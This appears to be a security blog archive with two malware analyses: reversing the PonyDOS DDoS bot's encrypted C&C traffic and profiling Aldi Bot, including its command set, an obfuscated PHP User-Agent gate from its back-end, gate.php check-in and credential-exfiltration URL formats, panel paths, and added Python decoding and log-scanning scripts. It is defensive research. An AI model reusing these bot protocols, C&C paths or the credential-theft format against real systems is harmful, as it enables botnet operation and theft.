Tag Archives : Bot March 2012

Not just a one-trick PonyDOS

By: jedwards

Reversing the crypto used by the PonyDOS attack bot

This blog post is the third installment in our ongoing series of articles exploring the crypto systems commonly found in various DDoS malware families.  In previous articles we covered the reversing of the Armageddon and Khan DDoS bots; today we will cover a new malware family that we are calling Trojan.PonyDOS.  This malware family started showing up on our radar screens late in 2011.  Based on a static analysis of the malware, it seems that PonyDOS bot is yet another example of a bot that is exclusively focused on launching DDoS attacks against victim websites.  During dynamic analysis in a sandbox, we observed one PonyDOS sample phoning home to its C&C, and getting a response back; sadly, the communications were encrypted.  It turns out that PonyDOS uses a relatively complicated encryption mechanism to secure its communications, the reversing of which is discussed in detail in the linked report below.  As described in this report, PonyDOS has quite a few tricks up its sleeve that are designed to make its communications resistant to casual attempts at breaking.

PonyDOS gets its name from the string PNYDOS00 that is embedded within the bot binaries; as discussed in the report, the bot includes this identifying string in the “phone home” messages it sends to its command & control (C&C) server.  In addition, some of the samples also like to install themselves into sub-directories named pny within the infected user’s Application Data directory, for example as the file:

C:\Documents and Settings\$USERNAME\Application Data\pny\pnd.exe

We reversed the malware’s crypto in order to gain a better insight into its behavior.  A complete analysis of the crypto system used by PonyDOS, including a Python implementation of a decryption/encryption module, is available here:

Report:  Not just a one-trick PonyDOS

Breaking the encryption used by our little PonyDOS was instrumental in understanding its various DDoS attack mechanisms, and developing defenses against them.  It turns out that PonyDOS supports the following four attack types:

  • A TCP Connection Flood;
  • An HTTP GET flood that does not attempt to read any response from the target web server;
  • An HTTP GET flood that does read responses from the target web server;
  • An HTTP POST flood.

Of course, once we had broken the PonyDOS crypto, we started using our Python script (in encryption mode) to generate fake phone home messages in order to impersonate bots and trick the PonyDOS C&C servers into giving up their current attack orders.  This allows us to monitor PonyDOS botnets and observe attacks.  To date we’ve logged attacks against various target web sites hosted in the United States, Russia, and Luxembourg.  The PonyDOS botmasters seem to favor the GET flood attacks, with almost half (94 out of 192 logged events) of its attacks being specified as attack code 0x01 (GET without server read) or 0x02 (GET with server read).  TCP Connection Floods (code 0x00) and POST floods (code 0x03) were used less frequently as alternate attack types.

This completes the third installment in our ongoing series on breaking the crypto systems used by contemporary DDoS malware families.

DDoS Watch: Keeping an Eye on Aldi Bot

By: cwilson

Background

The intention of this entry is to profile some elements of the Aldi Bot in order to provide value for the security operations community and malware research community.

Aldi Bot is a newer inexpensive DDoS bot that is growing in popularity. Recent data (September 30 2011) suggests that there are at least 50 distinct Aldi bot binaries that have been seen in the wild with 44 unique Command & Control points. We see the bot active in Russia, the Ukraine, the US, and Germany. While it has been stated that Aldi Bot won’t be developed further, the source code has leaked which makes it easy to find and use.

G-Data and others in the security community have discussed this bot in recent weeks. Of special interest to those concerned with availability, Aldi Bot offers HTTP and TCP DDoS capabilities along with Firefox, Pidgin and jDownloader credential theft, the creation of a SOCKS5 proxy and the ability to download and execute malicious code of the attacker’s choice.

To underscore its attack capabilities, Aldi Bot was used to DDoS bka.de, the German federal police website, in a demonstration video.

Figure 1 – Aldi Bot demonstration video launching DDoS attack on bka.de


All it takes is one bot such as Aldi Bot or another tool such as a Remote Access Trojan (RAT) to provide an attacker a handhold on the inside of an organization that can lead to a much larger security breach. It is now well-known that attacks involving the exfiltration of sensitive data typically start with one smaller compromise that is then leveraged for additional access. Additionally, Aldi Bot steals passwords, and passwords are often re-used for convenience even though it is a dangerous practice. Without proper monitoring of system and network activity, such infected nodes can be long-lived and pose significant risk.

Thankfully in this case it seems that the Aldi Bot back-ends aren’t long lasting. Of the list of 41 back-ends that I obtained on September 30, 2011, it appears that only 13 of them were still online as of October 3, 2011.

Detection & uniqueness of threat

The author of Aldi Bot suggests that the bot will not be FUD (fully undetectable) and indeed Aldi Bot’s initial antivirus detection based on a September 22, 2011 analysis of the sample I analyzed (MD5: c903b63346c90d29b0fe711a68a747ba) features a 72.7% detection rate, with four vendors using a term similar to “Aldi Bot” such as “Abot” or “Albot”. The rest of the detections are generic.

http://www.virustotal.com/file-scan/report.html?id=dd29102bd9dc8e6599c38ea6dab9164bc5f072f2de0dc5706f120199c14b8949-1316731656

As antivirus detection can be an indicator that triggers an organization’s Incident Response function, responders will have to dig a little deeper in many cases because generic alerts don’t provide much context as to the true nature of the threat. An example of this is a user seeking assistance with an Aldi Bot infection using the default filename “jetzt_kommt_aldi.exe” on September 4, 2011 on a Microsoft forum:

http://answers.microsoft.com/en-us/protect/forum/protect_scanning/jetztkommtaldiexe/27675ad5-45ba-4958-a6db-87b96a57164e?msgId=37b909f4-35f7-4d72-a0e3-a6704207c66b

While it has been speculated that Aldi Bot has borrowed from the Zeus banking Trojan source code release in early 2011, Aldi bot is written in Delphi with a PHP back-end, while Zeus is written in C++ with PHP on the back-end. The only obvious similarity between Zeus and Aldi Bot that I can see at first glance is that both of them tend to use a filename called gate.php on the web-based back-end as a “drop zone” to process stolen data.

Commands

Aldi bot’s commands are as follows:

  • ‘StartHTTP’ – starts an HTTP DDoS attack
  • ‘StartTCP’ – starts a TCP DDoS attack
  • ‘StopHTTPDDoS’ – stops an HTTP DDoS attack
  • ‘StopTCPDDoS’ – stops a TCP DDoS attack
  • ‘StopDDoS’ – apparently stops all DDoS attacks
  • ‘DownloadEx’ – download and execute other code (malware)
  • ‘CreateSocks’ – creates a SOCKS5 proxy
  • ‘StealData’ – trigger password stealing functionality
  • ‘Update’ – updates the bot

Custom User-Agent gets the goods

A potentially useful tidbit of information was found while reverse engineering the bot stub. While looking at an InternetOpenA API call associated with outbound activity, I noticed that a custom User-Agent “Aldi Bot FTW! :D” is used. It should be trivial to monitor for the presence of this string on the network.

push 10h ; dwFlags
push offset szProxyBypass ; lpszProxyBypass
push offset szProxyBypass ; lpszProxy
push 0 ; dwAccessType
push offset aAldiBotFtwD ; "Aldi Bot FTW! :D"
call InternetOpenA

If the wrong User-Agent is sent, then the back-end will not respond. On the wire, a request to gate.php from an infected host looks similar to this (values are obscured for security).

Figure 2 – infected host reaching out to back-end at initial infection time


Once the source code for Aldi Bot was obtained, it was easy to find this function:

Figure 3 – Delphi source code indicates custom User-Agent


The back-end code that performs this checking was found with a datestamp from August 27, 2011 (the initial announcement for Aldi bot itself was apparently made one day later on an underground forum on August 28, 2011). The PHP code that performs the User-Agent checking is as follows:

<?php
// Obfuscation helper: strip spaces and 'x' characters, then hex-decode what is left
function dnSOIAN0EWrU($XbJ41W11sYuW){
$XbJ41W11sYuW=str_replace(' ','',$XbJ41W11sYuW);
$XbJ41W11sYuW=str_replace('x','',$XbJ41W11sYuW);
$XbJ41W11sYPW=pack('H*',$XbJ41W11sYuW);
return $XbJ41W11sYPW;
}
// Drop the request unless its User-Agent equals the decoded constant
// (the constant is a single string literal; the wrap in the original listing is not part of it)
$_SERVER['HTTP_USER_AGENT']!=base64_decode(strrev(dnSOIAN0EWrU(strrev(substr('94320157587b6163524342633157625c62585943514632514d3d3',-48))))) ? exit(): '';

While decoding what’s going on here would be an interesting exercise, it’s easier just to see what’s happening with a slight modification to echo the expected User-Agent string:

$ua = base64_decode(strrev(dnSOIAN0EWrU(strrev(substr('94320157587b6163524342633157625c62585943514632514d3d3',-48)))));
echo "Expected User-Agent: [", $ua, "]";

Running the PHP code then displays the expected string:

$ php -f aldi.php
Expected User-Agent: [Aldi Bot FTW! :D]
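The same decoding chain reimplemented in Python, as an added example that is not part of the original post or of the Aldi Bot kit. It assumes only the hex constant and the function names shown in the PHP above, and exposes each intermediate value (the 48-character tail, the reversed hex, the base64 text) so the result reported above can be checked step by step rather than trusted from one echo.

```python
"""Python re-implementation of the Aldi Bot back-end User-Agent check (added example;
the PHP listing above is the kit's code, this is not).  The PHP one-liner chains:
    substr(hex, -48) -> strrev -> dnSOIAN0EWrU (strip ' ' and 'x', hex decode)
    -> strrev -> base64_decode
and calls exit() when the request's User-Agent differs from the result.
"""
import base64
import binascii

# The obfuscated constant exactly as it appears in the recovered gate.php
# (the line break in the listing above is a wrap, not part of the string).
OBFUSCATED = "94320157587b6163524342633157625c62585943514632514d3d3"


def php_strrev(s: str) -> str:
    """PHP strrev(): byte-wise reversal; the data here is ASCII, so str reversal matches."""
    return s[::-1]


def dn_soian0ewru(hexstr: str) -> bytes:
    """Mirror of dnSOIAN0EWrU(): drop spaces and 'x' characters, then pack('H*')."""
    cleaned = hexstr.replace(" ", "").replace("x", "")
    return binascii.unhexlify(cleaned)


def decode_steps(obfuscated: str = OBFUSCATED) -> dict:
    """Return every intermediate value of the chain so each step can be checked by hand."""
    tail = obfuscated[-48:]                      # substr(..., -48)
    reversed_hex = php_strrev(tail)              # strrev()
    raw = dn_soian0ewru(reversed_hex)            # hex decode
    b64 = php_strrev(raw.decode("ascii"))        # strrev()
    ua = base64.b64decode(b64).decode("ascii")   # base64_decode()
    return {"tail": tail, "reversed_hex": reversed_hex, "base64": b64, "user_agent": ua}


def decode_expected_user_agent(obfuscated: str = OBFUSCATED) -> str:
    """The cleartext User-Agent the back-end insists on."""
    return decode_steps(obfuscated)["user_agent"]


def user_agent_accepted(request_ua: str, obfuscated: str = OBFUSCATED) -> bool:
    """True when the back-end would not exit(): the check is an exact string compare,
    so any deviation in the header value makes the server stay silent."""
    return request_ua == decode_expected_user_agent(obfuscated)


if __name__ == "__main__":
    for name, value in decode_steps().items():
        print(f"{name:>13}: {value}")
```

Running the block prints the four intermediate values; the base64 stage reads QWxkaSBCb3QgRlRXISA6RA==, which decodes to the string the PHP echoes. When a re-packaged kit changes the constant, only OBFUSCATED needs to be swapped to recover the new User-Agent for monitoring.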

Analyzing back-end functions and detecting Aldi Bot on the wire

Outbound traffic to the back-end “drop zone” will use an HTTP GET string that looks similar to this:

/gate.php?hwid=&pc=&localip=&winver=

The value for the hwid parameter is uniquely calculated based on the system’s hardware. The pc parameter is the PC’s name. The localip parameter is the local IP address of the system and winver is the version of Windows installed, with x32 or x64 appended to match a 32 or 64 bit architecture.

When stolen data (only passwords at this time) is exfiltrated, a ‘&steal=’ parameter will be used in the URL that will also include the hwid value, as such:

/gate.php?hwid=&steal=

The value passed in the steal parameter will be the type of credential and then the actual password values stolen from the system in the format of URL|User|Pass. Here is the back-end code responsible for storing the stolen credentials:

Figure 4 – PHP code handling stolen credentials


A quick Google query as of 10/3/2011 with elements from the gate.php string reveals two obvious infections (both reported for takedown) – one Windows 7 and one Windows XP:

http://<REMOVED>/b0ts4ev3ryb0dy/gate.php/gate.php?hwid=287389320&pc=%EE%E9%EB%EC-PC&localip=192.168.123.100&winver=Windows%207%20Professional%20x32.

http://<REMOVED>.ru/gate.php/gate.php?hwid=2001606274&pc=HOME-OFF-D5F0AC&localip=192.168.102.23&winver=Windows%20XP%20Professional%20x32.

The corresponding PHP back-end code:

//GET
$hwid = safe_xss($_GET['hwid']);
$localip = safe_xss($_GET['localip']);
$pc = safe_xss($_GET['pc']);
$winver = safe_xss($_GET['winver']);
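An added detection example, not from the original post or from the Aldi Bot back-end: a small Python scanner that applies the on-the-wire indicators described above (the custom User-Agent, the gate.php check-in parameters hwid/pc/localip/winver, and the hwid plus steal exfiltration shape) to HTTP proxy log lines. The tab-separated log format, the host names and the client addresses are constructed placeholders for this example, not observed indicators; the parser in scan_log is the only part that needs adapting to a real proxy's format.

```python
"""Scan proxy log lines for the Aldi Bot check-in and exfiltration patterns described
above (added example; not from the original post or the Aldi Bot kit).

Constructed log format (tab-separated; adapt scan_log to your proxy's real format):
    timestamp  client_ip  method  url  user_agent
"""
from urllib.parse import parse_qs, urlsplit

ALDI_USER_AGENT = "Aldi Bot FTW! :D"                    # from the InternetOpenA call above
CHECKIN_PARAMS = {"hwid", "pc", "localip", "winver"}   # /gate.php?hwid=&pc=&localip=&winver=

# Constructed sample traffic: hosts and addresses are placeholders, not real indicators.
SAMPLE_LOG = """\
2011-10-03T10:00:01Z\t10.0.0.5\tGET\thttp://cnc.example/b0ts/gate.php?hwid=287389320&pc=WORKSTATION-PC&localip=192.168.123.100&winver=Windows%207%20Professional%20x32\tAldi Bot FTW! :D
2011-10-03T10:00:07Z\t10.0.0.5\tGET\thttp://cnc.example/b0ts/gate.php?hwid=287389320&steal=Firefox%7Chttp://mail.example%7Cbob%7Chunter2\tAldi Bot FTW! :D
2011-10-03T10:00:09Z\t10.0.0.9\tGET\thttp://www.example/index.html\tMozilla/5.0 (Windows NT 6.1)
2011-10-03T10:00:12Z\t10.0.0.7\tGET\thttp://other.example/gate.php?hwid=1&pc=X&localip=10.0.0.7&winver=Windows%20XP%20x32\tMozilla/4.0
"""


def classify_request(url: str, user_agent: str) -> dict:
    """Return the indicator hits for one request; an empty dict means nothing matched."""
    parts = urlsplit(url)
    params = parse_qs(parts.query)
    hits = {}
    if user_agent == ALDI_USER_AGENT:
        hits["user_agent"] = user_agent
    if parts.path.endswith("/gate.php"):
        if CHECKIN_PARAMS.issubset(params):
            # Initial check-in: hwid, PC name, local IP and Windows version (x32/x64 suffix)
            hits["checkin"] = {k: params[k][0] for k in sorted(CHECKIN_PARAMS)}
        if "hwid" in params and "steal" in params:
            # Credential upload: credential type followed by URL|User|Pass, per the post
            hits["exfil"] = {"hwid": params["hwid"][0], "fields": params["steal"][0].split("|")}
    return hits


def verdict(hits: dict) -> str:
    """Exact UA match or a steal= upload is high confidence; the check-in parameter
    shape alone (seen with any other UA) is worth a look but could be a lookalike."""
    if "user_agent" in hits or "exfil" in hits:
        return "high"
    if "checkin" in hits:
        return "medium"
    return "none"


def scan_log(text: str) -> list:
    """Parse the constructed log format and return one alert per matching line."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, ua = line.split("\t", 4)
        hits = classify_request(url, ua)
        if hits:
            alerts.append({"ts": ts, "client": client, "verdict": verdict(hits), "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["client"], alert["verdict"], alert["hits"])
```

Matching the User-Agent exactly is deliberate: the back-end itself refuses anything else, so a bot that reaches its C&C always sends that literal string. The check-in shape is graded lower because gate.php and a hwid parameter are also the Zeus convention noted above, and the steal hit is the one to escalate, since it means credentials have already left the host.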

This screenshot of bot statistics from one C&C shows that there were 239 bots online at one point; however, only 8 bots were active, making this particular instance of the Aldi botnet very small. This could be due to reasonably good antivirus detection of the bot. The pie chart looks incorrect; however, the stats indicate that the Netherlands experienced the highest infection rate at 57.7%, followed by the US with 10.5%.

Figure 5 – bot stats found on one C&C


While the Aldi Bot source code has since been obtained, at first we only had a binary copy. In that case, the Interactive Delphi Reconstructor (IDR) does a pretty nice analysis job. IDR worked better than IDA or DeDe when working with Aldi Bot.

Figure 6 – IDR analysis of back-end traffic generation


The default names of other Aldi bot back-end webapp components of interest (useful for network monitoring or probing on a C&C) include:

admin/inc
admin/inc/config.php
admin/inc/sess.php
admin/functions.php
admin/login.php
admin/pie.php
admin/index.php
admin/downlogs/
admin/img/aldi.gif
admin/js
admin/uploads/
geoip.php
index.php?id=stats
index.php?id=bots
index.php?id=bots&p=0
index.php?id=tasks
index.php?id=logs
index.php?id=upload
index.php?id=showlogs
index.php?logout

In addition to getting some value from watching for these patterns on the network, a review of back-ends indicates that sometimes certain folders such as admin/inc have directory indexing enabled which makes for an obvious C&C fingerprint.

Other indicators may include the following strings that have been seen in at least one Aldi Bot server-side install:

  • “Aldi Bot – installed by till7”
  • “StealData!” (from a misconfigured server)

The back-end login page looks like this:

Download and Execute in practice

As an example of the possible use for the “DownloadEx” function, a bit of poking at an active Aldi Bot campaign reveals the following:

1) Installation of yet another DDoS bot called Infinity Bot that has HTTP, ICMP, and TCP flooding capabilities.

2) Execution of the dScriptSt4r Anti-Virus Deleter, a simple batch file that tries to disable as many anti-virus applications as possible.

3) Secure-Soft Stealer 5.20, which is designed to steal credentials from the following applications:

  • Trillian, Pidgin, Vitalwerks dynamic update client, DynDNS updater client, Steam, Opera, Firefox, Safari, jDownloader, Outlook, eMule, BulletProof FTP, Flash FXP, Miranda, Windows key, FileZilla, SmartFTP, MSN, ICQ, CoreFTP, and perhaps others.

Aldi Bot is just another in a long line of DDoS tools, however its inexpensive nature seems to have made it quickly popular. Underground forum posts praise its ability to perform effective DDoS attacks, which may have also contributed to the increase in popularity.

Figure 8 – Aldi Bot graphic from the back-end kit

References:

G Data: Botnets on discount:

http://blog.gdatasoftware.com/blog/article/botnets-on-discount.html

H-Online: Malware for everyone – Aldi Bot at a discount price

http://www.h-online.com/security/news/item/Malware-for-everyone-Aldi-Bot-at-a-discount-price-1346594.html

Aldi Bot – bka.de DDoS video:

http://www.youtube.com/watch?v=UskKFTFVLyI

Thanks to Arbor’s ASERT Team, Damballa and other anonymous contributors for additional data used in this analysis.